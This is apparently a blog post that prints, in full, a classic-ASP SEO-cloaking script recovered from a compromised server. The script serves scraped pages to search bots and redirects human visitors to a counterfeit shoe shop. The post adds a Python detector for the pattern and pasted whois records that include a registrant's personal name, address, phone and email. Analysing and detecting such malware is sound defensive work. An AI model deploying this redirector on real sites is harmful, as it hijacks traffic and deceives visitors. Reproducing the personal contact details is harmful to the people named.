Today I’ll show you a script written in classic ASP which, once planted on a server through some vulnerability, diverts traffic from an unaware website to another one through a second unaware server.
It’s quite simple, so I’m not going to explain it in detail.
This malicious code was found on a server and is provided as is (I didn’t change or hide the malicious recipient), solely for educational purposes.
The educational purpose is basically the creation of an HTML or XML parser in classic ASP; I’ll also show examples of other ASP functions.
This file is called “airmaxonline2014wszat.asp”, but on the victim server there were many similar files in many folders with different names. You can also save it under whatever name you prefer.
What changes in each file?
Basically the only three variables that change are “fromsite”, “tourl” and “pageid”. “jumptodomain” is always the same, since the purpose of the operation is to always bring traffic to the same website.
Note how the filename (and obviously tourl) resembles fromsite, to have a better impact on referral analysis.
A trickier aspect, meant to avoid serving just a blank page that redirects to the target website, is fetching the HTML of the middle-tier web page, so that the page looks like a real, existing page full of content.
Enjoy the code.
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
' Every runtime error (failed fetch, failed decode, bad regex) is swallowed: the page degrades silently instead of revealing itself.
On Error Resume Next
' Per-file settings: fromsite is the site whose HTML is scraped, tourl is this script's own URL, jumptodomain receives all human visitors.
dim jumptodomain, imagefolder, fromsite, tourl
jumptodomain = "www.ebrandshoe.com"
fromsite = "http://www.airmaxonline2014.com/"
tourl ="http://www.foo.com/airmaxonline2014wszat.asp"
pageid = "airmaxonline2014"
imagefolder = "images/"
tourl = tourl&"?"&pageid&"="
' Rebuilds this request's absolute URL; it is leaked to jumptodomain as the "from" parameter.
Function GetLocationURL()
Dim Url
Dim ServerPort,ServerName,ScriptName,QueryString
ServerName = Request.ServerVariables("SERVER_NAME")
ServerPort = Request.ServerVariables("SERVER_PORT")
ScriptName = Request.ServerVariables("SCRIPT_NAME")
QueryString = Request.ServerVariables("QUERY_STRING")
Url="http://"&ServerName
If ServerPort <> "80" Then Url = Url & ":" & ServerPort
Url=Url&ScriptName
If QueryString <>"" Then Url=Url&"?"& QueryString
GetLocationURL=Server.URLEncode(Url)
End Function
' Minimal regex "parser": returns the first capture group of regstr found in str, or "" when there is no match.
Function GetCode(str,regstr)
Dim Reg,serStr,Cols
Set Reg= new RegExp
Reg.IgnoreCase = True
Reg.MultiLine = True
Reg.Pattern =regstr
If Reg.test(str) Then
Set Cols = Reg.Execute(str)
GetCode=Cols(0).SubMatches(0)
Else
GetCode=""
End If
Set Cols = Nothing
Set Reg = Nothing
End Function
%>
<%
on error resume next
' Synchronous server-side GET of URL through MSXML; the raw response bytes are decoded by Bytes2bStr.
Function getHTTPPage(URL)
Set HTTPReq = Server.createobject("Msxml2.XMLHTTP")
HTTPReq.Open "GET", URL, False
HTTPReq.send
If HTTPReq.readyState <> 4 Then Exit Function
getHTTPPage = Bytes2bStr(HTTPReq.responseBody)
Set HTTPReq = Nothing
End Function
' Intended to turn the response byte array into a UTF-8 string via ADODB.Stream (Position = 2 skips a byte-order mark).
Function Bytes2bStr(vin)
Dim BytesStream,StringReturn
Set BytesStream = Server.CreateObject("ADODB.Stream")
BytesStream.Type = 2
BytesStream.Open
BytesStream.WriteText vin
BytesStream.Position = 0
BytesStream.Charset = "UTF-8"
BytesStream.Position = 2
StringReturn =BytesStream.ReadText
BytesStream.close
Set BytesStream = Nothing
Bytes2bStr = StringReturn
End Function
' With a pageid parameter the named sub-page of fromsite is scraped, otherwise its home page. Asset URLs are rewritten
' to absolute ones on fromsite and every href is routed back through tourl, so a crawler following links stays on this
' compromised host (note the js/ <-> skin/ mix-up in the replacements, present as found).
if request(pageid)<>"" then
htmls = getHTTPPage(fromsite&request(pageid))
htmls = replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls = replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,"href="&chr(34),"href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http")
htmls = replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl)
else
htmls = getHTTPPage(fromsite)
htmls = replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls = replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls = replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/")
htmls = replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/")
htmls = replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls = replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/")
htmls = replace(htmls,"href="&chr(34),"href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/")
htmls = replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http")
htmls = replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl)
end if
dim pagetitle
' Extract the scraped page's <title> text with the regex helper above.
pagetitle = GetCode(htmls,"<title>(.*?)<\/title>")
pagetitle = Server.URLEncode(pagetitle)
dim agent,language,referer
agent=request.servervariables("http_user_agent")
language=request.servervariables("HTTP_ACCEPT_LANGUAGE")
referer=request.servervariables("HTTP_REFERER")
if language = "" and referer = "" then
' No Accept-Language and no Referer is typical of a crawler: only a User-Agent containing "bot" gets the scraped HTML.
' Everything else (real browsers send Accept-Language) is bounced to jumptodomain, with this page's URL and the
' scraped title passed along as query parameters.
if InStr(agent, "bot")<=0 then
Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle
Response.End
end if
else
Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle
Response.End
end if
response.write htmls
%>
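As an added defender-side example (not part of the original post and not the script's own code), the following Python script triages classic-ASP source files for the combination of traits this sample shows: a server-side fetch of another site's HTML, a visitor fingerprint built from Accept-Language, Referer and a "bot" substring in the User-Agent, and a Response.Redirect to a hard-coded external host. It also pulls out the quoted host names for the incident report. The indicator regexes, the verdict rules, the tree walker and the two embedded sample files (with example.com/.org/.net placeholder domains) are all constructed assumptions.

```python
"""Static triage of classic-ASP files for the cloaking-redirect pattern.

Added example (not code from the original post).  Indicator patterns,
verdict rules and the embedded sample files are this editor's assumptions.
"""
import os
import re
from dataclasses import dataclass

# Individually these are common in legitimate ASP; the combination in one
# small file is what makes a cloaking redirector stand out.
INDICATORS = {
    "remote_fetch": re.compile(
        r'CreateObject\s*\(\s*"(?:Msxml2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP'
        r'|WinHttp\.WinHttpRequest)', re.I),
    "hardcoded_url": re.compile(r'=\s*"https?://[^"]+"', re.I),
    "referer_check": re.compile(r'ServerVariables\s*\(\s*"HTTP_REFERER"', re.I),
    "language_check": re.compile(r'ServerVariables\s*\(\s*"HTTP_ACCEPT_LANGUAGE"', re.I),
    "bot_ua_check": re.compile(r'InStr\s*\([^)]*,\s*"bot"\s*\)', re.I),
    "external_redirect": re.compile(r'Response\.Redirect\s+"https?://', re.I),
    "errors_suppressed": re.compile(r'^\s*On\s+Error\s+Resume\s+Next', re.I | re.M),
    "byte_stream_decode": re.compile(r'"ADODB\.Stream"', re.I),
}
FINGERPRINT = {"referer_check", "language_check", "bot_ua_check"}

# Quoted host names (optionally with scheme). Lowercase-only on purpose, so COM
# ProgIDs such as "Msxml2.XMLHTTP" or "ADODB.Stream" are not taken for domains.
DOMAIN_RX = re.compile(r'"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,6})[/"]')


@dataclass
class Finding:
    path: str
    hits: dict      # indicator name -> number of matches
    verdict: str    # "cloaking-redirect", "conditional-redirect" or "clean"


def scan_source(path: str, text: str) -> Finding:
    """Score one ASP source text against the indicator table."""
    hits = {name: len(rx.findall(text)) for name, rx in INDICATORS.items()}
    present = {name for name, count in hits.items() if count}
    if "remote_fetch" in present and "external_redirect" in present and present & FINGERPRINT:
        verdict = "cloaking-redirect"      # scrapes a page, fingerprints the visitor, bounces humans
    elif "external_redirect" in present and present & FINGERPRINT:
        verdict = "conditional-redirect"   # no scraping, but still a visitor-dependent off-site redirect
    else:
        verdict = "clean"
    return Finding(path, hits, verdict)


def extract_domains(text: str) -> list:
    """Hard-coded hosts found in the file, for the report or a blocklist."""
    return sorted({m.group(1).lower() for m in DOMAIN_RX.finditer(text)})


def scan_tree(root: str) -> list:
    """Walk a web root (the sample was dropped in many folders) and triage every .asp/.asa file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".asp", ".asa")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.append(scan_source(full, fh.read()))
    return findings


# Constructed sample mirroring the structure of the script above (placeholder domains).
SUSPECT_ASP = '''<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
On Error Resume Next
dim jumptodomain, fromsite, tourl
jumptodomain = "shop.example.com"
fromsite = "http://www.example.org/"
tourl = "http://www.example.net/page.asp"
Function getHTTPPage(URL)
Set HTTPReq = Server.createobject("Msxml2.XMLHTTP")
HTTPReq.Open "GET", URL, False
HTTPReq.send
getHTTPPage = Bytes2bStr(HTTPReq.responseBody)
End Function
agent=request.servervariables("http_user_agent")
language=request.servervariables("HTTP_ACCEPT_LANGUAGE")
referer=request.servervariables("HTTP_REFERER")
if language = "" and referer = "" then
if InStr(agent, "bot")<=0 then Response.Redirect "http://"&jumptodomain&"/?from=x" end if
else
Response.Redirect "http://"&jumptodomain&"/?from=x"
end if
response.write htmls
%>'''

# Constructed benign page: a login-gated local redirect, no remote fetch, no fingerprinting.
BENIGN_ASP = '''<%
If Session("user") = "" Then
    Response.Redirect "/login.asp"
End If
%>
<html><head><title>Account</title></head><body>Welcome</body></html>'''

if __name__ == "__main__":
    for f in (scan_source("suspect.asp", SUSPECT_ASP), scan_source("account.asp", BENIGN_ASP)):
        print(f.path, f.verdict, {k: v for k, v in f.hits.items() if v})
```

Run it against a copied web root with scan_tree and review every non-clean finding; the verdict is a triage hint, so a file that only trips "conditional-redirect" still deserves a look at where it sends visitors and why.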
Of course it is natural to be curious about who tried to profit from these pages, and anyone can perform a whois request on the two domains to learn more about them. To do you a favour, I’m just copying here what the whois returned to me, so you can save time.
The scammer:
Registrant Org: MING AI is associated with ~22 other domains
Registrar: GODADDY.COM, LLC
Registrar Status: clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited
Dates: Created on 2014-07-22 - Expires on 2015-07-22 - Updated on 2014-08-18
Name Server(s): F1G1NS1.DNSPOD.NET (has 1,672,713 domains), F1G1NS2.DNSPOD.NET (has 1,672,713 domains)
IP Address: 109.235.50.202 - 12 other sites hosted on this server
IP Location: Netherlands - Utrecht - Houten - Xeneurope Vps Services
ASN: Netherlands AS47869 NETROUTING-AS Netrouting,NL (registered Sep 09, 2008)
Domain Status: Registered And Active Website
Whois History: 11 records have been archived since 2011-05-14
IP History: 5 changes on 5 unique IP addresses over 3 years
Registrar History: 1 registrar with 1 drop
Hosting History: 4 changes on 3 unique name servers over 3 years
Whois Server: whois.godaddy.com
Website
Website Title: EBrandShoe - Cheap NIKE - JUST DO IT, Enjoy buying cheap nike air max, nike free,nike air max ireland store are discount price and 100% quality goods!
Server Type: Apache/2.2.15
Response Code: 200
SEO Score: 83%
Terms: 3073 (Unique: 348, Linked: 2788)
Images: 48 (Alt tags missing: 15)
Links: 771 (Internal: 771, Outbound: 0)
Whois Record (last updated on 2014-08-28)
Domain Name: EBRANDSHOE.COM
Registrar URL: http://www.godaddy.com
Registrant Name: MING AI
Registrant Organization:
Name Server: F1G1NS1.DNSPOD.NET
Name Server: F1G1NS2.DNSPOD.NET
DNSSEC: unsigned
The (unaware?) supporter:
airmaxonline2014.com | Domain Informations
Updated: 2014-06-12
Air Max Online 2014 Airmaxonline2014 airmaxonline2014.com
Technicals Datas
Page Rank: N/A
IP: 94.242.255.127
IP-based Geolocation of Airmaxonline2014.com: Luxembourg
IP-based Coordinate: latitude: 49.75 | longitude: 6.17
Status: Online (New)
Domain Name: AIRMAXONLINE2014.COM
Registry Domain ID: 1855988301_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2014-04-24 03:37:24Z
Creation Date: 2014-04-24 10:37:00Z
Registrar Registration Expiration Date: 2015-04-24 10:37:00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252744500
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: TIAN JING
Registrant Organization:
Registrant Street: NO.516, XIBALIWA, SHIZHONGQU
Registrant City: JINAN
Registrant State/Province: SHANDONG
Registrant Postal Code: 250002
Registrant Country: CN
Registrant Phone: +86.5132973673
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: NHURIE@SINA.COM
Registry Admin ID:
Admin Name: TIAN JING
Admin Organization:
Admin Street: NO.516, XIBALIWA, SHIZHONGQU
Admin City: JINAN
Admin State/Province: SHANDONG
Admin Postal Code: 250002
Admin Country: CN
Admin Phone: +86.5132973673
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: NHURIE@SINA.COM
Registry Tech ID:
Tech Name: TIAN JING
Tech Organization:
Tech Street: NO.516, XIBALIWA, SHIZHONGQU
Tech City: JINAN
Tech State/Province: SHANDONG
Tech Postal Code: 250002
Tech Country: CN
Tech Phone: +86.5132973673
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: NHURIE@SINA.COM
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
DNSSEC: unSigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
Last update of WHOIS database: 2014-04-24 03:37:24Z